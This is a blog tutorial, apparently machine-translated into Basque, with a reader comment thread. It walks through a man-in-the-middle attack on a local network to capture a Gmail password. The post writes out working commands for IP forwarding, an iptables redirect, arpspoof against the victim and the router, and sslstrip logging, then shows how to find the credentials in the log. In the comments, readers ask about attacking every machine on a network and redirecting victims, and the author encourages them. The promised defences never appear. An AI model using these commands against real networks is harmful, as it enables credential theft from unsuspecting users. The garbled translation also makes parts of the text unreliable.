ArpSpoofing eta SSlstrip Martxan.

Kaixo blogariak.

Gaur egun, lagin txiki bat daukat zeinen arriskutsua izan daitekeen edozein saretan konektatzea gutako askok gustuko ditugunen segurtasunik gabe.

Gaurkoan, ArpSpoofing erabiliko dut Sslstrip-ekin Gmail pasahitza lortzeko. Ingurunea kontrolatuagoa izan dadin, "izeneko kontu bat sortu duttestarp@gmail.com".

Hitzaurreak asko gustatzen ez zaizkidanez, ekin diezaiogun kontuari.

Ez naiz edozein unetan erantzule honako informazioarekin zer egin dezaketen. Hezkuntza helburuetarako soilik egiten dut

INGURUNEA

Proba honetarako honako hau dugu:

1. Erasotzailea: Nire mahaigaineko edo mahaigaineko ordenagailua da Debian Wheezy duena. Biltegietatik instalatu dezakezu sslstrip y dsniff izatea lortzea arpsspoofing

2. Biktima: Biktima bere posta arakatzailearen bidez soilik ikusi nahi duen Android Tablet bat da.

3. Bitartekoa: Erdikoa nire da Cisco DPC2425 bideratzailea

HELBIDEAK.

Erasotzailearen helbidea: 172.26.0.2

Bideratzailearen helbidea: 172.26.0.1

Biktimaren helbidea: 172.26.0.8

ERASOA:

Erasoa nola funtzionatzen duen ulertzeko, nire zaharrarengana jo dezakezu POST

Eraso honen aurrean egingo dugun lehenengo gauza aurrerapena aktibatzea da, gure ordenagailuak biktimari informazioa helarazi diezaien konturatu gabe. (Bestela, zerbitzuen erasoa ukatzea litzateke)

Horretarako erabiliko ditugu:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Komando bakoitza kontsola zuzeneko leiho batean.

Orain buztana -f linux-etik egiten badugu informazioa zuzenean eta zuzenean ikusiko dugu

 

argazkia 1

 

Orduan, nola lortu nahi duguna?

Sartu dezagun lehenik gure posta Tabletan. Saioa hasi bitartean, milaka eta milaka gauza agertzen direla ikusten dugu gure kontsolan.

Amaitutakoan, "desdelinux" fitxategia nano-rekin irekiko dugu

nano desdelinux

Control + W-rekin SECURE POST izeneko zerbait bilatzen dugu.

Eta horrelako zerbait ikusiko dugu.

 

argazkia 2

 

Ikusten ez den lerro erraldoi horren artean biktimaren helbide elektronikoa eta pasahitza daude.

Beraz, eskuinera egingo dugu korrika, tunelaren amaieran argia ikusi arte.

 

argazkia 3

 

Beste behin, eraso hauetatik nola babestu dezakegun ikusiko dugu.

dagokionez


Artikuluaren edukia gure printzipioekin bat dator etika editoriala. Akats baten berri emateko egin klik hemen.

27 iruzkin, utzi zurea

Utzi zure iruzkina

Zure helbide elektronikoa ez da argitaratuko.

*

*

  1. Datuen arduraduna: Miguel Ángel Gatón
  2. Datuen xedea: SPAM kontrolatzea, iruzkinen kudeaketa.
  3. Legitimazioa: Zure baimena
  4. Datuen komunikazioa: datuak ez zaizkie hirugarrenei jakinaraziko legezko betebeharrez izan ezik.
  5. Datuak biltegiratzea: Occentus Networks-ek (EB) ostatatutako datu-basea
  6. Eskubideak: Edonoiz zure informazioa mugatu, berreskuratu eta ezabatu dezakezu.

  1.   @Jlcmux esan zuen

    Aukera hau aprobetxatzen dut esateko mezua argitaratu zenean aginduak ez zirela zuzenak.

    Amaieran iptables komandoari beste linea batean dagoen 8080 falta zaio. Orduan, arpspoof komandoak lerro berean zeuden. Komando bakoitza lerro desberdinean dago.

    Zorionez editoreak ikusi eta konpon dezake.

    Agurra.

    1.    Iturriaren eskuliburua esan zuen

      Aipatu dituzun zuzenketak egin ditut, ondo al dago?

      Hobetsitako sarrera batean kodea txertatuko baduzu, erabili HTML ikuspegia eta egiaztatu artikulua zuzena dela zain dagoenera bidali aurretik. Eskerrik asko.

  2.   Luis esan zuen

    Kezkagarria da jakitea ez dugunok hain zaurgarriak garela jakitea. Informazio oso ona gaia gutxi ulertzen dudanean ere garrantziaz jabetzen naiz. Eskerrik asko!
    dagokionez

  3.   Giskard esan zuen

    Baina horrek funtzionatzen du erasotzailea eta biktima sare berean badaude. Nolanahi ere, iruditzen zait (sare berean egotea) HTTPS erabiliz konektatzen bazara hori ez dela gertatuko, datuak zure makina utzi baino lehen enkriptatuta daudelako. HTTP bidez (S gabe) konektatzen bazara sareko kableari begiratuta ere teklak ikusten direla uste dut.

    1.    @Jlcmux esan zuen

      Ez da egia. Gmail pasahitza pirateatzen ari naiz eta Gmail-ek ohartzen bazara https erabiltzen du. Orduan? Kontua da https https segurua den arren, http-ren araberakoa dela. Beraz, ez da hain segurua.

      Ez aitortu hainbeste https-ri buruz S ez dela Supermanentzat "segurua" dela

    2.    RTen esan zuen

      https-rekin edo gabe funtzionatzen du, linux distro espezializatuago batekin probatu dut eta arazorik gabe funtzionatzen du

    3.    Iturriaren eskuliburua esan zuen

      Zehazki erabil dezakezu Wi-Fi lapurtzen dutenei ikasgaia emateko. 😀

      Gutxi gorabehera Chema Alonsoren blogean aspaldi esaten zutena bezalakoa da:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonantea esan zuen

        Ostia, zoragarria zer egiten duen! / Eta orduan esaten didate nire paranoikoa VPNa erabiltzen dudan bakoitzean bankuko kontua egiaztatzera joaten direnean ...). Bide batez, ikusi behar duzu jendea nola den zinikoa iruzkinetan ... azkenean lapurreta egiten badu ...

        1.    eliotime3000 esan zuen

          Orain zure VPN zerbitzua sortu eta eskaintzeko tutoriala hartu behar dugu.

      2.    Daniel esan zuen

        Lotzen duzun istorioa oso interesgarria da, nobela liburu bat merezi duela dirudi, eta horrek gogorarazten dit nire bizilagunen internet erabili nuenean eta gaia ezagutzen dudala esaten dudan arren, uste dut sekula ezin nituela ikusi benetako dimentsioak izan zitekeen arriskua, zorionez niretzat, pasahitza WPA2-ra aldatu zuten eta hor hasi zen ISP-rekin nuen istorioa

    4.    Mauritius esan zuen

      Horregatik izenburuak Sslstrip ekintzan dio.

      Funtzionatzen du, erasotzailea erdian baldin badago

  4.   anon esan zuen

    Zer olatu lantzen duzu prisman? -.-
    ez.
    Zeren zain zaude zure eskaera XD bidaltzeko
    dagokionez
    mezu ona

  5.   auroszx esan zuen

    Interesgarria, proba didaktikoa egingo dut gero ... Agian WiFi pasahitza kendu eta pixka bat ondo pasatzeko ere 😛
    Edozein kasutan, antzeko zerbait egin al dezakezu eskatutako helburuei orrialde desberdinak bidaltzeko? Adibidez, Facebook ireki nahi dute eta nik Google-ra bideratzen ditut? 😛

    1.    @Jlcmux esan zuen

      Bai. Baina dena oso desberdina da.

      Agian gero argitaratuko dut.

  6.   azken berria esan zuen

    oso mezu ona, gai hauek oso hezitzaileak dira, orain eraso honi aurre egiteko gai izan behar dugu, batzuk (ni bezala) sare publikoetara konektatzen baitira (unibertsitatea adibidez) saihestea lagungarria izango litzateke.

    Agurrak!

  7.   beste erabiltzaile bat esan zuen

    Ez zitzaidan balio work

  8.   aupa esan zuen

    Zerbait huts egiten dit hemen, https konexioak zerbitzariaren ziurtagiri baten bidez enkriptatuta daudela (ziurtagiria zure ordenagailuan duzunean, zure arakatzailea enkriptatzeaz arduratzen da) iptables-ekin 80 ataka birbideratzen duzula (http) , ez 443 https da

    1.    @Jlcmux esan zuen

      Hori ere pentsatu nuen. Kontua da https https "segurua" den arren tamalez http-ren menpe dagoela. Beraz, sslstripek hori aprobetxatzen du, arakatzaileak https kredentzialak erabiltzen dituela sinestarazten dio baina ez.

      1.    aupa esan zuen

        kaka santua! baina nabigatzaileak abisu bat ikusi beharko luke "ziurtagiri hau gune susmagarri batetik dator edo horrelako zerbait" ... XD probak egin beharko ditut zalantzarik gabe

        1.    @Jlcmux esan zuen

          Ez, ez da ezer ateratzen.

  9.   beste erabiltzaile bat esan zuen

    Azkenean niretzat funtzionatu zuen
    WEP sare batean konektatuta nago pasahitzarekin, eta hala ere zuzenean erakutsi zidan pasahitza.

    Kontsulta bat. Prozedura bera egin al dezakezu baina sarean konektatuta dauden ordenagailu guztientzat, biktima bakarra izan beharrean?

    1.    @Jlcmux esan zuen

      Bai, egin dezakezu. Baina ez dut esperimenturik egin. Probatu zeure burua eta kontaiguzu nola zabiltzan.

  10.   sinnick19 esan zuen

    Honekin lortzen dudan gauza bakarra da biktimaren makina lineaz kanpo dagoela, baina sslstrip-ek ez dit ezer erakusten: /

    1.    @Jlcmux esan zuen

      Suebakia desaktibatu behar duzu une batez. Edo, gutxienez, sarrerako konexioak gaitu.

  11.   Black jauna esan zuen

    Probe eta nik facebook orriko erabiltzaile izena eta pasahitza ikusi ahal izan genituen, gmail-en ez nuen emaitzarik aurkitu egunkarian, gainera «arpspoof -i -t« arpspoof lerro bat besterik ez nuen behar. Bestalde, biktimaren makinak ezin izan ditu orrialde batzuk ireki. Ikertzen jarraituko dut, oso interesgarria da. Instalatzeko paketeak Manjaro erabiltzen dutenentzako laguntza dira: dsniff (hemen arpspoff), twisted eta python2-pyopenssl. Sslstrip hemendik deskarga daiteke: http://www.thoughtcrime.org/software/sslstrip/
    $ Python2 sslstrip.py exekutatzeko
    Agurra.

  12.   Black jauna esan zuen

    Ez zen atera baina arpspoof lerroa hauxe da: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert esan zuen

    begira, zuk diozuna egiten dut.

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT-to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Arazoa da biktima, hemen nire gelan dudan beste ordenagailu bat, konexiorik gabe geratzen dela bideratzailea berrabiarazi behar dudan punturaino, zer egin dezaket, lagundu.

    Beste gauza bat makina birtual batekin ari naiz lanean, eta iwconfig komandoa exekutatzen dudanean, wlan0 ez da agertzen, ezta ifconfig exekutatzen dudanean ere, hala ere, internet badut nire makina birtualean eth0 interfazearekin.

bool (egia)